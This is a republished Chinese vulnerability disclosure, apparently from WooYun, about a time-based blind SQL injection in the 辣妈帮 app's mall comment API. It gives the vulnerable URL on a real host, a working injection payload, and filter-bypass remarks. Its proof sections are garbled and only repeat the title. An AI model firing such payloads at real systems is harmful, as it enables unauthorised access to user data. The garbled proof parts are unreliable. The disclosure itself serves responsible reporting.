神刀安全网

漏洞标题: 辣妈帮官方APP存在SQL注入(SQLMap跑limit后注入)

漏洞详情

披露状态:

2016-04-16: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:辣妈帮IOS APP

检测发现以下地方存在SQL注入:(注入参数ps,时间盲注,明显是Pagesize的缩写~)

code 区域
http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1

Payload:(延时2秒)

code 区域
http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1%20procedure%20analyse%28extractvalue%281,benchmark%2810000000,md5%28111%29%29%29,1%29%20--%20-

另外发现过滤了MID和ORD、大小于号,换个函数即可,另外自定义了个Payload给SQLMap。

漏洞证明:

1、当前数据库用户

漏洞标题:  辣妈帮官方APP存在SQL注入(SQLMap跑limit后注入)

2、当前数据库

漏洞标题:  辣妈帮官方APP存在SQL注入(SQLMap跑limit后注入)

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 辣妈帮官方APP存在SQL注入(SQLMap跑limit后注入)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址